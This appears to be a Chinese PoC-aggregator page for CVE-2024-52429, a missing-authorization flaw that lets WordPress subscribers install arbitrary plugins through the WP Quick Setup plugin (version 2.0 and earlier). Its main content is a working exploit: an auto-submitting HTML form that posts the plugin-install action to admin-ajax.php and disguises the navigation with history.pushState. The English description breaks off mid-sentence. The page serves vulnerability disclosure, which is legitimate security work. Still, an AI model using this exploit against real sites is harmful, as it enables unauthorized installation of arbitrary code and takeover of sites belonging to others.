POC详情: 1fb565b4595c9e0568f9bfe5d0b9908aa6554dba

来源
关联漏洞
标题: WordPress plugin WP Quick Setup 代码问题漏洞 (CVE-2024-52429)
描述:WordPress和WordPress plugin都是WordPress基金会的产品。WordPress是一套使用PHP语言开发的博客平台。该平台支持在PHP和MySQL的服务器上架设个人博客网站。WordPress plugin是一个应用插件。 WordPress plugin WP Quick Setup 2.0版本及之前版本存在代码问题漏洞,该漏洞源于允许危险类型文件无限制上传。
描述
WP Quick Setup <= 2.0 - Missing Authorization to Authenticated (Subscriber+) Arbitrary Plugin/Theme Installation
介绍
# CVE-2024-52429
WP Quick Setup &lt;= 2.0 - Missing Authorization to Authenticated (Subscriber+) Arbitrary Plugin/Theme Installation

# Description: 

The WP Quick Setup plugin for WordPress is vulnerable to unauthorized plugin and theme installation due to a missing capability check on a function in all versions up to, and including, 2.0. This makes it 

```
Type: plugin
CVSS Score: 8.8
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
CVE: CVE-2024-52429
```

POC
---

Login as a subscriber then run this html

```
<html>
  <body>
    <form action="https://wp-dev.ddev.site/wp-admin/admin-ajax.php" method="POST">
      <input type="hidden" name="action" value="wes&#95;install&#95;plugins" />
      <input type="hidden" name="plugin&#95;urls&#91;&#93;" value="https&#58;&#47;&#47;downloads&#46;wordpress&#46;org&#47;plugin&#47;wdes&#45;responsive&#45;mobile&#45;menu&#46;zip" />
      <input type="submit" value="Submit request" />
    </form>
    <script>
      history.pushState('', '', '/');
      document.forms[0].submit();
    </script>
  </body>
</html>
```
文件快照

[4.0K] /data/pocs/1fb565b4595c9e0568f9bfe5d0b9908aa6554dba └── [1.1K] README.md 0 directories, 1 file
神龙机器人已为您缓存
备注
    1. 建议优先通过来源进行访问。
    2. 如果因为来源失效或无法访问,请发送邮箱到 f.jinxu#gmail.com 索取本地快照(把 # 换成 @)。
    3. 神龙已为您对POC代码进行快照,为了长期维护,请考虑为本地POC付费,感谢您的支持。